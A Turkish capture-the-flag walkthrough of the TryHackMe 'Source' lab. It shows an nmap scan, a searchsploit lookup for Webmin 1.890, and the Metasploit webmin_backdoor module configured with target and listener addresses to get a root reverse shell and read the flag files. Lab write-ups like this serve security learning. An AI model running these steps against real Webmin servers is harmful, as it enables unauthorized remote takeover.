TryHackMe – Source Makine Çözümü

Table of Contents

Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “Source” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…

Çözüm

1 — Nmap aracını kullanarak makine üzerindeki açık portlar ve servisler hakkında detaylı bilgi ediniyorum.

[root:/home/alper/Desktop/TRYHACKME]# nmap -sS -sV 10.10.99.82
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-09 19:35 +03
Nmap scan report for 10.10.99.82
Host is up (0.079s latency).
Not shown: 998 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
10000/tcp open  http    MiniServ 1.890 (Webmin httpd)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

2 — Searchspoit ile “Webmin 1.890” için bir exploit arıyorum. Bulduğum exploitin “metasploit-framework” üzerindeki modül halini kullanıyorum.

[root:/home/alper/Desktop/TRYHACKME]# searchsploit "webmin 1.890"
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit)                       | linux/webapps/47330.rb
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

3 — “exploit/linux/http/webmin_backdoor” modülünü kullanarak bir shell alıyorum.

msf6 exploit(linux/http/webmin_backdoor) > set RHOSTS 10.10.99.82
RHOSTS => 10.10.99.82
msf6 exploit(linux/http/webmin_backdoor) > set LHOST 10.8.94.51
LHOST => 10.8.94.51
msf6 exploit(linux/http/webmin_backdoor) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(linux/http/webmin_backdoor) > run

4 — Root kullanıcısında olduğumu görüyorum. Bayrakları elde ediyorum.

whoami                 
root
SHELL=/bin/bash script -q /dev/null
root@source:/usr/share/webmin/# cat /home/dark/user.txt
cat /home/dark/user.txt
*CENSORED*
root@source:/usr/share/webmin/# cat /root/root.txt
cat /root/root.txt
*CENSORED*